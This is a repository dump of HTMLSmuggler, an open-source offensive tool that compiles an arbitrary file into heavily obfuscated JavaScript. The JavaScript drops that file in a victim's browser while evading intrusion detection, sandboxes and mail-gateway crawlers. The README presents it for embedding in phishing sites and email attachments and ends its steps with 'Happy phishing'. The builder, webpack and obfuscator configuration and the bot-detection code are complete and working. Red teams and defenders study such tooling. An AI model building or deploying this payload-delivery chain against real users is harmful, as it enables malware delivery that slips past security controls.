Repository: D00Movenok/HTMLSmuggler Branch: main Commit: 79f03dcad005 Files: 20 Total size: 20.4 KB Directory structure: gitextract_azg0zlky/ ├── .babelrc.js ├── .browserslistrc ├── .eslintrc.js ├── .gitattributes ├── .gitignore ├── .prettier.js ├── LICENSE ├── README.md ├── builder.js ├── examples/ │ ├── html/ │ │ ├── index.html │ │ └── payload.umd.js │ └── vuejs/ │ ├── Main.vue │ └── payload.esm.js ├── obfuscator.js ├── package.json ├── src/ │ ├── assets/ │ │ └── .gitkeep │ ├── index.js │ └── utils.js ├── test/ │ └── test_payload.txt └── webpack.config.js ================================================ FILE CONTENTS ================================================ ================================================ FILE: .babelrc.js ================================================ module.exports = { presets: [ [ "@babel/preset-env", { useBuiltIns: "usage", corejs: 3, }, ], ], }; ================================================ FILE: .browserslistrc ================================================ > 0.5% last 2 versions not dead ie 10 ================================================ FILE: .eslintrc.js ================================================ module.exports = { env: { browser: true, es2021: true, }, extends: ["airbnb-base", "prettier"], plugins: ["simple-import-sort"], overrides: [ { env: { node: true, }, files: [".eslintrc.{js,cjs}"], parserOptions: { sourceType: "script", }, }, ], parserOptions: { ecmaVersion: "latest", sourceType: "module", }, rules: { "import/prefer-default-export": "off", "simple-import-sort/imports": "error", "simple-import-sort/exports": "error", }, ignorePatterns: ["examples/**/payload.*.js"], globals: { CONFIG_COMPRESS: true, CONFIG_ANTIBOT: true, CONFIG_DELAY: true, }, }; ================================================ FILE: .gitattributes ================================================ examples/**/payload.*.js filter=lfs diff=lfs merge=lfs -text ================================================ FILE: .gitignore ================================================ .DS_Store node_modules/ dist/ # all payloads src/assets/* !src/assets/.gitkeep *.log ================================================ FILE: .prettier.js ================================================ module.exports = { printWidth: 80, tabWidth: 2, useTabs: false, semi: true, singleQuote: true, quoteProps: "as-needed", trailingComma: "all", bracketSpacing: true, bracketSameLine: false, arrowParens: "always", proseWrap: "preserve", htmlWhitespaceSensitivity: "strict", vueIndentScriptAndStyle: true, endOfLine: "lf", }; ================================================ FILE: LICENSE ================================================ MIT License Copyright (c) 2023 Georgii Gennadev Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: README.md ================================================ # HTMLSmuggler ✉️ [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) HTMLSmuggler - JS payload generator for IDS bypass and payload delivery via HTML smuggling. ## Description The full explanation what is HTML Smuggling may be found [here](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/). The primary objective of HTML smuggling is to bypass network security controls, such as firewalls and intrusion detection systems, by disguising malicious payloads (e.g. executables/archives/etc.) within seemingly harmless HTML and JavaScript code. By exploiting the dynamic nature of web applications, attackers can deliver malicious content to a user's browser without triggering security alerts or being detected by traditional security mechanisms. Thanks to this technique, the download of a malicious file is not displayed in any way in modern IDS solutions. The main goal of HTMLSmuggler tool is creating an independent javascript library with embedded malicious user-defined payload. This library may be integrated into your phishing sites/email html attachments/etc. to deliver embedded payload to the target user system (bypassing IDS and IPS system). An example of created javascript library may be found [here](examples/html/payload.umd.js). ## Features * Built-in highly configurable JavaScript obfuscator that fully hides your payload makes it impossible to extract your payload from javascript manually. * Powerful client-side bots and headless crawlers detection library that doesn't share your payloads with smart secure mail gateways and their friends. * Delay before loading to avoid sandboxes that are in a hurry. * May be used both as an independent JS library or embedded in JS frameworks such as React, Vue.js, etc. * The simplicity of the template allows you to add extra data handlers/compressions/obfuscations. * Support a lot of browsers (including old IE10). ## Installation 1. [Install yarn](https://classic.yarnpkg.com/lang/en/docs/install/) package manager. 2. Install dependencies: ```bash yarn ``` 3. Read help message. ```bash yarn build -h ``` ```text Options: -p, --payload Path to payload file you want to smuggle -n, --name Name of file, that would be downloaded -t, --type Contet-Type of downlonaded file (default: "application/octet-stream") -f, --function Name of exported function (default: "download") -c, --compress Enable payload compression (gzip) -d, --delay Delay before antibot and download in ms (default: 0) -a, --antibot Enable bot detection and block them (recommended) -h, --help display help for command ``` ## Usage ### Preparation steps 1. **(Optional)** Modify [javascript-obfuscator options](https://github.com/javascript-obfuscator/javascript-obfuscator#javascript-obfuscator-options) in `obfuscator.js`, my preset is nice, but very slow. 2. Compile your javascript payload: > ⚠️ AVOID USAGE OF PAYLOADS BIGGER THAN 3 MiB (see [FAQ](#faq)) ```bash yarn build -p /path/to/payload -n file.exe -t "application/octet-stream" -c -a -d 3000 ``` 3. Get your payload from `dist/payload.esm.js` or `dist/payload.umd.js`. After that, it may be inserted into your page and called with `download()` (or custom specified with `-f` flag) function. > `payload.esm.js` is used in `import { download } from 'payload.esm';` imports (ECMAScript standart). > > `payload.umd.js` is used in html script SRC and `require('payload.umd');` imports (CommonJS, AMD and pure html). ### Pure HTML example A full example may be found [here](examples/html/). 1. Do [preparation steps](#preparation-steps). 2. Import created script to html file (or insert it inline): ```html ``` 3. Call `download()` function from body: ```html ``` 4. Happy phishing :) ### VueJS example A full example may be found [here](examples/vuejs/). 1. Do [preparation steps](#preparation-steps). 2. Import created script to vue file: ```vue ``` 3. Call `download()` function: ```vue ``` 4. Happy phishing :) ## FAQ **Q**: I have an error `RangeError: Maximum call stack size exceeded`, how to solve it? **A**: This [issue described here](https://github.com/javascript-obfuscator/javascript-obfuscator/issues/89). To fix it, try to disable `splitStrings` in `obfuscator.js` or make smaller payload (it's recommended to use up to 2 MB payloads because of this issue). --- **Q**: Why does my payload build so long? **A**: The bigger payload you use, the longer it takes to create a JS file. To decrease time of build, try to disable `splitStrings` in `obfuscator.js`. Below is a table with estimated build times using default `obfuscator.js`. | Payload size | Build time | | --- | --- | | 525 KB | 53 s | | 1.25 MB | 8 m | | 3.59 MB | 25 m | ================================================ FILE: builder.js ================================================ /* eslint-disable no-console */ /* eslint-disable import/no-extraneous-dependencies */ const fs = require("fs"); const { program } = require("commander"); const webpack = require("webpack"); const fflate = require("fflate"); const webpackConfig = require("./webpack.config"); program .requiredOption( "-p, --payload ", "Path to payload file you want to smuggle" ) .requiredOption( "-n, --name ", "Name of file, that would be downloaded" ) .option( "-t, --type ", "Contet-Type of downlonaded file", "application/octet-stream" ) .option("-f, --function ", "Name of exported function", "download") .option("-c, --compress", "Enable payload compression (gzip)") .option("-d, --delay ", "Delay before antibot and download (ms)", 0) .option("-a, --antibot", "Enable bot detection and block them (recommended)"); program.parse(); console.log("Using payload:", program.opts().payload); console.log("Using filename:", program.opts().name); console.log("Using Content-Type:", program.opts().type); console.log("Exported function:", program.opts().function); console.log("Compression:", program.opts().compress); console.log("Delay:", program.opts().delay, "ms"); console.log("Antibot:", program.opts().antibot); const dst = "src/assets/payload.bin"; fs.readFile(program.opts().payload, { encoding: "latin1" }, (err, data) => { if (err) throw err; const aData = fflate.strToU8(data, true); const payload = program.opts().compress ? fflate.compressSync(aData, { level: 9, mem: 12 }) : aData; console.log("Payload size:", payload.length, "b"); fs.writeFile(dst, payload, { flag: "w+" }, (err2) => { if (err2) throw err2; const compiler = webpack( webpackConfig({ filetype: program.opts().type, filename: program.opts().name, funcname: program.opts().function, compress: program.opts().compress, antibot: program.opts().antibot, delay: program.opts().delay, }) ); compiler.run((err3, stats) => { if (err3) throw err3; console.log( stats.toString({ colors: true, }) ); }); }); }); ================================================ FILE: examples/html/index.html ================================================ Some phishy site ================================================ FILE: examples/html/payload.umd.js ================================================ version https://git-lfs.github.com/spec/v1 oid sha256:5c9f1b9fc83c374a00fd63c9b353b37b1d587bb41e4064eb9a1aad1d87dbb7b8 size 1092062 ================================================ FILE: examples/vuejs/Main.vue ================================================ ================================================ FILE: examples/vuejs/payload.esm.js ================================================ version https://git-lfs.github.com/spec/v1 oid sha256:4168d1bf553806cec123e3a7370c595068f3167a7998438242edac2cfc7ae361 size 1098951 ================================================ FILE: obfuscator.js ================================================ // Obfuscator doc: // https://github.com/javascript-obfuscator/javascript-obfuscator#javascript-obfuscator-options module.exports = { compact: true, controlFlowFlattening: true, controlFlowFlatteningThreshold: 1, deadCodeInjection: true, deadCodeInjectionThreshold: 1, // NOTE: disable debugProtection for testing in console debugProtection: true, debugProtectionInterval: 4000, disableConsoleOutput: true, // NOTE: add domains to work only specified domains // e.g. example.com, sub.example.com domainLock: [], domainLockRedirectUrl: "about:blank", forceTransformStrings: [], identifierNamesCache: null, identifierNamesGenerator: "mangled-shuffled", identifiersDictionary: [], identifiersPrefix: "", ignoreImports: false, inputFileName: "", log: true, numbersToExpressions: true, renameGlobals: false, renameProperties: true, renamePropertiesMode: "safe", // NOTE: dirty fix to make BotD work with obfuscator reservedNames: ["sent", "trys"], reservedStrings: [], seed: 0, selfDefending: true, simplify: true, sourceMap: false, sourceMapBaseUrl: "", sourceMapFileName: "", sourceMapMode: "separate", sourceMapSourcesMode: "sources-content", // NOTE: disable splitStrings if "Maximum call stack size exceeded" splitStrings: true, splitStringsChunkLength: 35, stringArray: true, stringArrayCallsTransform: true, stringArrayCallsTransformThreshold: 1, stringArrayEncoding: ["base64", "rc4"], stringArrayIndexesType: ["hexadecimal-number"], stringArrayIndexShift: true, stringArrayRotate: true, stringArrayShuffle: true, stringArrayWrappersCount: 6, stringArrayWrappersChainedCalls: true, stringArrayWrappersParametersMaxCount: 6, stringArrayWrappersType: "function", stringArrayThreshold: 1, target: "browser", transformObjectKeys: true, unicodeEscapeSequence: false, }; ================================================ FILE: package.json ================================================ { "name": "html-smuggler", "version": "1.2.0", "description": "Payload delivery using HTML smuggling", "private": true, "repository": { "url": "https://github.com/D00Movenok/HTMLSmuggler", "type": "git" }, "author": "Georgii Gennadev ", "license": "MIT", "scripts": { "build": "node builder.js", "lint": "eslint . --ext .js --fix --ignore-path .gitignore" }, "devDependencies": { "@babel/core": "^7.23.9", "@babel/preset-env": "^7.23.9", "babel-loader": "^9.1.3", "binary-loader": "^0.0.1", "commander": "^11.0.0", "eslint": "^8.46.0", "eslint-config-airbnb-base": "^15.0.0", "eslint-config-prettier": "^8.9.0", "eslint-plugin-import": "^2.28.0", "eslint-plugin-simple-import-sort": "^10.0.0", "javascript-obfuscator": "^4.0.2", "prettier": "^3.0.0", "string-replace-loader": "^3.1.0", "webpack": "^5.88.2", "webpack-obfuscator": "^3.5.1" }, "dependencies": { "@fingerprintjs/botd": "^1.9.0", "core-js": "3", "fflate": "^0.8.0" } } ================================================ FILE: src/assets/.gitkeep ================================================ ================================================ FILE: src/index.js ================================================ import { decompressSync, strToU8 } from "fflate"; import payload from "./assets/payload.bin"; import { download, isBot, sleep } from "./utils"; async function main() { // sleep before execution await sleep(CONFIG_DELAY); // antibot if (CONFIG_ANTIBOT) { const ib = await isBot(); if (ib) { console.log("Detected bot, exit"); return; } } // data decompressing and downloading console.log("Downloading data. Compressed:", CONFIG_COMPRESS); let data = strToU8(payload, true); data = CONFIG_COMPRESS ? decompressSync(data) : data; download(data, "dont_change_filename_var", "dont_change_content_type_var"); } export { main as dontChangeFunctionName }; ================================================ FILE: src/utils.js ================================================ import { load } from "@fingerprintjs/botd"; function download(data, filename, type) { const blob = new Blob([data], { type }); if (window.navigator.msSaveOrOpenBlob) { window.navigator.msSaveOrOpenBlob(blob, filename); } else { const url = URL.createObjectURL(blob); const a = document.createElement("a"); a.style = "display: none"; a.href = url; a.download = filename; document.body.appendChild(a); a.click(); setTimeout(() => { document.body.removeChild(a); window.URL.revokeObjectURL(url); }, 0); } } function sleep(ms) { return new Promise((resolve) => { console.log("Sleeping:", ms, "ms"); setTimeout(resolve, ms); }); } async function isBot() { let ib = false; await load({ monitoring: false, }) .then((botd) => botd.detect()) .then((result) => { console.log("Antibot result:", result); // dirty hack to bypass obfuscator renameProperties ib = Object.values(result).some((val) => val === true); }) .catch((error) => { console.log("Antibot error:", error); }); return ib; } export { download, isBot, sleep }; ================================================ FILE: test/test_payload.txt ================================================ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse ipsum sapien, pulvinar sed auctor et, ultricies rhoncus mi. Aenean eu lorem vitae massa imperdiet mattis sit amet vel lorem. Fusce eu tortor sem. Fusce dapibus volutpat enim, eget laoreet ex. Nullam nec vehicula mauris. Vestibulum vehicula sapien ut lacus varius varius. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras ultricies dictum sapien, nec tempor est lacinia in. Morbi sed lobortis est. Donec sodales imperdiet nisl nec lacinia. Donec facilisis, eros ac pellentesque scelerisque, orci ante aliquam felis, vel consequat eros urna tincidunt nulla. Donec consequat tempor nibh vitae egestas. In consectetur nisl et consequat auctor. Phasellus scelerisque lectus in felis bibendum imperdiet. Donec sit amet magna nec nisi malesuada lacinia. Praesent finibus nulla in dui tristique dapibus. Aenean ultricies urna volutpat sem feugiat laoreet. Donec imperdiet tortor at massa ornare finibus. Donec sem odio, convallis ut vehicula interdum, consectetur quis metus. Integer ut tempus sapien, in porttitor tortor. Etiam eget ligula magna. Sed luctus felis sed magna elementum tincidunt. In eleifend velit at massa iaculis, non tempor lacus iaculis. Ut rutrum tempus nunc, at ullamcorper sapien consequat porttitor. Mauris condimentum tempus consectetur. Donec at tortor nunc. Morbi condimentum et justo in vestibulum. Donec consectetur nisl quis massa vulputate molestie. Etiam nec ultricies mi. Suspendisse potenti. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Sed suscipit et felis et malesuada. Nullam ut massa eros. Sed non faucibus lectus. Sed laoreet vel diam id tempor. Donec elementum libero non sodales tincidunt. Nullam maximus elit vel gravida consequat. Mauris eget neque lacinia, lacinia ipsum id, consectetur urna. Phasellus varius urna risus, et volutpat velit ultrices vitae. Interdum et malesuada fames ac ante ipsum primis in faucibus. Curabitur quam odio, hendrerit eu ornare vitae, fringilla vitae ligula. Phasellus sodales consectetur nisl, eget mollis tellus hendrerit vitae. Quisque quis metus risus. In bibendum facilisis augue ac faucibus. Suspendisse ornare, ante a rutrum viverra, nisi tellus tempor elit, eget bibendum nibh elit non urna. Vivamus nisi nulla, lobortis ac faucibus a, commodo vel purus. Curabitur molestie risus eros, at aliquam mi rutrum id. Fusce non est rhoncus, iaculis quam sed, accumsan erat. Vestibulum eros elit, porttitor quis fringilla vel, volutpat nec dui. Sed nec urna aliquam, blandit sem vel, dapibus nulla. Aliquam commodo consectetur libero sed suscipit. Cras semper pellentesque lorem sed dignissim. Vestibulum lectus purus, mollis eu viverra in, placerat quis dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. In dolor felis, commodo sit amet felis sit amet, rhoncus pellentesque mauris ================================================ FILE: webpack.config.js ================================================ const path = require("path"); const webpack = require("webpack"); const WebpackObfuscator = require("webpack-obfuscator"); const obfuscatorOptions = require("./obfuscator"); module.exports = ({ filename, filetype, funcname, compress, antibot, delay, }) => { const commonConfig = { mode: "production", performance: { hints: false, maxEntrypointSize: 512000, maxAssetSize: 512000, }, entry: "./src/index.js", module: { rules: [ // NOTE: Defines string names, // used because webpack.DefinePlugin globals obfuscation issues. { test: /\.m?js$/, exclude: /node_modules/, use: { loader: "string-replace-loader", options: { multiple: [ { search: "dont_change_filename_var", replace: filename }, { search: "dont_change_content_type_var", replace: filetype }, { search: "dontChangeFunctionName", replace: funcname }, ], }, }, }, // NOTE: embed out payload to js { test: /assets\/.*/, exclude: /node_modules/, use: { loader: "binary-loader", }, }, // NOTE: support for older browsers { test: /\.m?js$/, exclude: /node_modules/, use: { loader: "babel-loader", }, }, // NOTE: heavy obfuscation { test: /.*/, enforce: "post", // NOTE: excluded core-js because it takes too long to obfuscate exclude: /node_modules\/core-js/, use: { loader: WebpackObfuscator.loader, options: obfuscatorOptions, }, }, ], }, plugins: [ // NOTE: Defines boolean globals to change execution flow. new webpack.DefinePlugin({ CONFIG_COMPRESS: JSON.stringify(compress), CONFIG_ANTIBOT: JSON.stringify(antibot), CONFIG_DELAY: JSON.stringify(delay), }), ], }; return [ { output: { path: path.resolve(__dirname, "dist"), filename: "payload.umd.js", libraryTarget: "umd", }, ...commonConfig, }, { output: { path: path.resolve(__dirname, "dist"), filename: "payload.esm.js", libraryTarget: "module", }, experiments: { outputModule: true, }, ...commonConfig, }, ]; };